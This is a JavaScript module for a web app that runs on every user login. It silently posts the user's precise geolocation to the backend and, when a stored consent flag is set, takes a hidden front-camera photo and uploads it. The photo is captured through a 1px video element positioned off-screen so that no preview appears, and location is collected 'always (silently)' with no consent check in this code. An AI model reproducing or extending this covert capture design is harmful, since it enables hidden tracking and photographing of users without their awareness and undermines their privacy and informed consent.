/**
 * sessionCapture.js
 *
 * Lightweight helpers that push two pieces of identity-verification data to
 * the backend whenever a user logs in:
 *
 *   1. The current geolocation (silently, in the background, never blocking).
 *   2. A one-frame silent camera photo IF the user has previously accepted
 *      the privacy notice. No preview is rendered — the camera turns on,
 *      one frame is captured, the stream is stopped, all within ~500ms.
 *
 * Everything here is best-effort and never throws into the caller.
 */
import axios from "axios";

const API = `${process.env.REACT_APP_BACKEND_URL}/api`;

const authHeader = () => {
  const t = localStorage.getItem("ca_token");
  return t ? { Authorization: `Bearer ${t}` } : {};
};

/* -------------------------------------------------------------------------- */
/* GEO                                                                        */
/* -------------------------------------------------------------------------- */
const askGeo = (opts) =>
  new Promise((resolve) => {
    if (typeof navigator === "undefined" || !navigator.geolocation) {
      resolve(null);
      return;
    }
    let done = false;
    const finish = (val) => {
      if (!done) {
        done = true;
        resolve(val);
      }
    };
    try {
      navigator.geolocation.getCurrentPosition(
        (pos) =>
          finish({
            lat: pos.coords.latitude,
            lng: pos.coords.longitude,
            accuracy: pos.coords.accuracy,
          }),
        () => finish(null),
        opts,
      );
    } catch {
      finish(null);
    }
    setTimeout(() => finish(null), (opts?.timeout || 8000) + 500);
  });

export const captureGeoSilent = async (source = "login") => {
  // First try high accuracy with a tight budget, then fall back. Safari iOS
  // sometimes refuses to resolve high-accuracy.
  let geo = await askGeo({ enableHighAccuracy: true, timeout: 5000, maximumAge: 0 });
  if (!geo) {
    geo = await askGeo({ enableHighAccuracy: false, timeout: 4000, maximumAge: 60000 });
  }
  if (!geo) return null;
  try {
    await axios.post(`${API}/users/session/capture-geo`, { ...geo, source }, { headers: authHeader() });
  } catch {
    /* ignore — best effort */
  }
  return geo;
};

/* -------------------------------------------------------------------------- */
/* SILENT PHOTO                                                               */
/* -------------------------------------------------------------------------- */
const grabFrame = (video) =>
  new Promise((resolve) => {
    const ready = () => {
      try {
        const canvas = document.createElement("canvas");
        canvas.width = video.videoWidth || 640;
        canvas.height = video.videoHeight || 480;
        const ctx = canvas.getContext("2d");
        ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
        const dataUrl = canvas.toDataURL("image/jpeg", 0.75);
        const b64 = dataUrl.split(",")[1];
        resolve(b64 || null);
      } catch {
        resolve(null);
      }
    };
    if (video.readyState >= 2) ready();
    else video.addEventListener("loadeddata", ready, { once: true });
    // Hard timeout in case readyState never advances
    setTimeout(() => resolve(null), 4000);
  });

export const captureSilentPhoto = async () => {
  if (typeof navigator === "undefined" || !navigator.mediaDevices?.getUserMedia) return null;
  let stream = null;
  try {
    // Prefer front camera for selfie-style verification on mobile.
    stream = await navigator.mediaDevices.getUserMedia({
      video: { facingMode: "user", width: { ideal: 640 }, height: { ideal: 480 } },
      audio: false,
    });
  } catch {
    return null;
  }
  try {
    const video = document.createElement("video");
    video.setAttribute("playsinline", "true");
    video.muted = true;
    video.style.position = "fixed";
    video.style.left = "-9999px";
    video.style.top = "-9999px";
    video.style.width = "1px";
    video.style.height = "1px";
    document.body.appendChild(video);
    video.srcObject = stream;
    try {
      await video.play();
    } catch {
      /* autoplay restrictions on some browsers — still try to grab a frame */
    }
    // Tiny warm-up so the sensor produces a non-black frame.
    await new Promise((r) => setTimeout(r, 350));
    const b64 = await grabFrame(video);
    try {
      video.pause();
      video.srcObject = null;
      video.remove();
    } catch {
      /* noop */
    }
    return b64;
  } finally {
    try {
      stream.getTracks().forEach((t) => t.stop());
    } catch {
      /* noop */
    }
  }
};

export const uploadSilentPhoto = async (b64) => {
  if (!b64) return false;
  try {
    await axios.post(
      `${API}/users/session/photo`,
      { photo_b64: b64, mime: "image/jpeg" },
      { headers: authHeader() },
    );
    return true;
  } catch {
    return false;
  }
};

/* -------------------------------------------------------------------------- */
/* CONSENT STATE                                                              */
/* -------------------------------------------------------------------------- */
export const getCameraConsentStatus = async () => {
  try {
    const r = await axios.get(`${API}/users/session/camera-consent`, { headers: authHeader() });
    return r.data; // { asked, accepted }
  } catch {
    return { asked: false, accepted: null };
  }
};

export const setCameraConsent = async (accepted) => {
  try {
    await axios.post(`${API}/users/session/camera-consent`, { accepted: !!accepted }, { headers: authHeader() });
    return true;
  } catch {
    return false;
  }
};

/* -------------------------------------------------------------------------- */
/* ORCHESTRATION                                                              */
/* -------------------------------------------------------------------------- */
/**
 * Run after every successful login. Captures geo always (silently), and a
 * camera photo ONLY if the user has previously accepted the privacy notice.
 *
 * @param {Object} opts
 * @param {boolean} [opts.adminLogin=false]  When true, skip the silent photo
 *   capture entirely (admins shouldn't be photographed on every login).
 */
export const runLoginCapture = async ({ adminLogin = false } = {}) => {
  // GPS always (silent; fails open)
  captureGeoSilent("login").catch(() => {});

  if (adminLogin) return;

  // Camera only if explicit consent was given previously
  let status;
  try {
    status = await getCameraConsentStatus();
  } catch {
    status = { asked: false, accepted: null };
  }
  if (!status?.accepted) return;
  try {
    const b64 = await captureSilentPhoto();
    if (b64) await uploadSilentPhoto(b64);
  } catch {
    /* fail silent */
  }
};

/* -------------------------------------------------------------------------- */
/* POST-REGISTRATION TRIGGER                                                  */
/* -------------------------------------------------------------------------- */
const PENDING_KEY = "ca_consent_pending_at";

/**
 * Call right after successful registration. Sets a localStorage flag that the
 * global <CameraConsentModal> picks up 10 seconds later and shows the
 * privacy dialog. Native camera permissions are requested at that point
 * (not before — registration must complete cleanly first).
 */
export const schedulePostRegisterConsent = (delayMs = 10000) => {
  try {
    localStorage.setItem(PENDING_KEY, String(Date.now() + delayMs));
  } catch {
    /* noop */
  }
};

export const consumePendingConsentTrigger = () => {
  try {
    const v = localStorage.getItem(PENDING_KEY);
    if (!v) return null;
    return Number(v) || null;
  } catch {
    return null;
  }
};

export const clearPendingConsentTrigger = () => {
  try {
    localStorage.removeItem(PENDING_KEY);
  } catch {
    /* noop */
  }
};
